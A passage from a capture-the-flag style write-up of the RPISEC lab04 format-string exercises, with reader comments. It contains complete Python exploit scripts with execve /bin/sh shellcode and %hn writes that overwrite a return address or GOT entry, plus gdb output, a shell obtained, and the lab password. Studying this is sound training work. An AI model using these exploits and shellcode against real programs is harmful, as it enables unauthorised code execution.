gdb-peda$ c Continuing. [----------------------------------registers-----------------------------------] EAX: 0x0 EBX: 0xb7fcd000 --> 0x1a9da8 ECX: 0x0 EDX: 0x804b0a0 --> 0x0 ESI: 0x0 EDI: 0x0 EBP: 0xbffff708 --> 0x0 ESP: 0xbffff66c --> 0x8048a8b (<main+171>: mov eax,DWORD PTR [esp+0xc]) EIP: 0x80489df (<log_wrapper+226>: ret) EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x80489d7 <log_wrapper+218>: add esp,0x134 0x80489dd <log_wrapper+224>: pop ebx 0x80489de <log_wrapper+225>: pop ebp => 0x80489df <log_wrapper+226>: ret 0x80489e0 <main>: push ebp 0x80489e1 <main+1>: mov ebp,esp 0x80489e3 <main+3>: and esp,0xfffffff0 0x80489e6 <main+6>: sub esp,0x90 [------------------------------------stack-------------------------------------] 0000| 0xbffff66c --> 0x8048a8b (<main+171>: mov eax,DWORD PTR [esp+0xc]) 0004| 0xbffff670 --> 0x804b008 --> 0xfbad2c84 0008| 0xbffff674 --> 0x8048cda ("Starting back up: ") 0012| 0xbffff678 --> 0xbffff8eb ("test") 0016| 0xbffff67c --> 0xbffff7a4 --> 0xbffff8d7 ("/levels/lab04/lab4A") 0020| 0xbffff680 --> 0x3 0024| 0xbffff684 --> 0x9 ('\t') 0028| 0xbffff688 --> 0xffc0003f [------------------------------------------------------------------------------] Legend: code, data, rodata, value Breakpoint 2, 0x080489df in log_wrapper () gdb-peda$
The top of the stack now points to the return address. Thus the address, where the return address is stored, is just the value of esp
: 0xbffff66c
.
Now we have got both addresses we were looking for:
–> buffer: 0xbffff56f
–> return address: 0xbffff66c
shellcode and %n specifier
For the shellcode we can just reuse the shellcode we used in the last labs. Because the buffer’s offset to the 4 byte alignment of the stack is 1 byte, I simply added nops
(0x90
) to the shellcode in order to align the following bytes.
The final python-script constructs the format string we can pass to the program as the filename:
lab4A@warzone:/tmp$ cat exploit_lab4A_2.py import sys from pwn import * shellcode = "\x90"\ "\x90\x31\xc0\x50"\ "\x68\x2f\x2f\x73"\ "\x68\x68\x2f\x62"\ "\x69\x6e\x89\xe3"\ "\x89\xc1\x89\xc2"\ "\xb0\x0b\xcd\x80" # len = 25 addr_offset = int(sys.argv[1], 16) addr_buf = 0xbffff56f - addr_offset addr_ret_addr = 0xbffff66c - addr_offset value_u2 = addr_buf >> 16 value_l2 = addr_buf & 0xffff expl = shellcode expl += p32(addr_ret_addr+2) # arg selector: $14 + 24/4 = $20 expl += p32(addr_ret_addr) # arg selector: $21 expl += "%" + str(value_u2 - 25 - 8) + "x" expl += "%20$hn" expl += "%" + str(value_l2 - value_u2) + "x" expl += "%21$hn" sys.stdout.write(expl)
The script basically works like the script in the last levels. Only the values have been adjusted.
Now we only need to try different offsets until we get a shell:
... lab4A@warzone:/tmp$ /levels/lab04/lab4A $(python exploit_lab4A_2.py 0x60) ERROR: Failed to open ββ1βPh//shh/binβββΒ° Νβββ βββ%49118x%20$hn%13584x%21$hn lab4A@warzone:/tmp$ /levels/lab04/lab4A $(python exploit_lab4A_2.py 0x70) ERROR: Failed to open ββ1βPh//shh/binβββΒ° Νββββββββ%49118x%20$hn%13568x%21$hn lab4A@warzone:/tmp$ /levels/lab04/lab4A $(python exploit_lab4A_2.py 0x80) ERROR: Failed to open ββ1βPh//shh/binβββΒ° Νββββββββ%49118x%20$hn%13552x%21$hn lab4A@warzone:/tmp$ /levels/lab04/lab4A $(python exploit_lab4A_2.py 0x90) ERROR: Failed to open (null) lab4A@warzone:/tmp$ /levels/lab04/lab4A $(python exploit_lab4A_2.py 0xa0) $ whoami lab4end $ cat /home/lab4end/.pass 1t_w4s_ju5t_4_w4rn1ng
Done! The final password is 1t_w4s_ju5t_4_w4rn1ng
.
Your writeups are phenomenal. Thank you so much for the help
Thanks π Great to hear that!
Hey,
your write-ups are very helpful!
Why using the “+2” at (lab4B solution line 23)-
expl += p32(exit_got+2)
I didn’t really understand that line…could you please explain?
Thanks!
Hey chak, thanks π
Of course! The “hn” format specifier is used to write only 2 bytes at a time. As we want to overwrite the full 32-bit (=4 byte) address stored in the GOT entry of exit, we need to do two separate writes.
The GOT entry of exit contains a 4 byte address:
exit_got: [ ][ ][ ][ ]
At first we write the value 0xbfff to exit_got+2. These are actually the upper two bytes:
exit_got: [ ][ ][ff][bf]
Then we write the value 0xf658 to exit_got (these are the lower two bytes):
exit_got: [58][f6][ff][bf]
(Notice that the values are stored in little endian.)
I hope this makes sense π If you have any other questions, feel free to ask!
Awesome, thanks!
Hi,
Thank you for the great work.
I was playing with the lab4B that I was able to solve but there is something i can’t figure out.
My solution works if I write the payload in a file and then use the cat technique just like you. (python solve.py > /tmp/payload.txt && cat /tmp/payload.txt – | ./lab4B)
But I would like to modify the script in order to solve it without using cat like this “io = process(“/levels/lab04/lab4B”) [..send the payload using io.sendline()..] io.interactive()” like I did with buffer overflow challenges. But it does not seem to work with io.interactive(). I get “Got EOF while reading in interactive” and the programs exits.
Do you have any idea on how to make it work using the io.interactive technique ?
Hey Adrien,
thanks for dropping a comment!
Actually I don’t see any obvious reason, why this should not work. Could you share your full script? π
Yes for sure, you can find it below.
If you copy paste it in /tmp/lab4B.py and run it, you will get a shell:
lab4B@warzone:/levels/lab04$ python /tmp/lab4B.py 0xbffff648 > /tmp/payload.txt && cat /tmp/payload.txt – | ./lab4B
[…]
id
uid=1015(lab4B) gid=1016(lab4B) euid=1016(lab4A) groups=1017(lab4A),1001(gameuser),1016(lab4B)
whoami
lab4A
But if you uncomment the line beginning with “io.” and run it like below, you will get the error message “Got EOF while reading in interactive”.
lab4B@warzone:/levels/lab04$ python /tmp/lab4B.py 0xbffff648
[*] Got EOF while reading in interactive
I use the original VM provided in the RPISEC Github, and I never update the content. So the version of pwntools is outdated (2.2.0).
My first hypothesis was the process spawned by the pwntools might slightly differ from the process spawned directly from the shell ; so the “buf” address might differ too. But after several tests, I’m quite sure the buf address is the same in the two cases.
Thank you for your help, and for your time :).
———————-
#-*- coding:utf-8 -*-
from pwn import *
import sys
payload = “\x31\xc0\x83\xec\x04\x89\x04\x24\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80”
bufAdr = int(sys.argv[1], base=16)
high = bufAdr >> 16
low = bufAdr & 0xFFFF
got = 0x080499b8
#io = process(“/levels/lab04/lab4B”)
padding = 3*”\x90″
offset1 = low – len(payload+padding) – 12
offset2 = high – low if high > low else 0x10000+high – low
#io.sendline(payload+padding+p32(got)+”JUNK”+p32(got+2)+”%”+str(offset1)+”x”+”%15$hn”+”%”+str(offset2)+”x”+”%17$hn”)
print(payload+padding+p32(got)+”JUNK”+p32(got+2)+”%”+str(offset1)+”x”+”%15$hn”+”%”+str(offset2)+”x”+”%17$hn”)
#print(io.recv(1000))
#io.interactive()
Actually your script is also working for me using the pwn tools functions:
lab4B@warzone:~$ python /tmp/lab4B.py 0xbffff648
[+] Starting program ‘/levels/lab04/lab4B’: Done
…
[*] Switching to interactive mode
…
$ id
uid=1015(lab4B) gid=1016(lab4B) euid=1016(lab4A) groups=1017(lab4A),1001(gameuser),1016(lab4B)
In order to determine what’s going on you can for example add raw_input(‘>’) after spawning the process with io = process(…). This will delay the exploit until you hit enter. Then in another terminal you can attach gdb to the already running process (you need to do this with root or lab4A privileges eg. with the gameadmin) using sudo gdb /levels/lab04/lab4B $(pidof lab4B). Now you can set a breakpoint, hit enter in the other terminal to trigger your exploit and check what’s going on π
Well … That’s weird. As you suggested, I debugged with GDB and found that with pwntools, the buf address is located at 0xbffff628 for me.
python /tmp/lab4B.py 0xbffff628 works like a charm.
Again thank you for your time, and for your write-ups. I learn a lot in this course, and it’s priceless to read write-ups from others and discover differents points of view and methodologies.
I am glad to hear that. Thank you π
Hi scryh,
I’m just dropping a comment to thank you for these amazing writeups that have helped me learn so much.
Cheers!
Thank you! Great to hear that π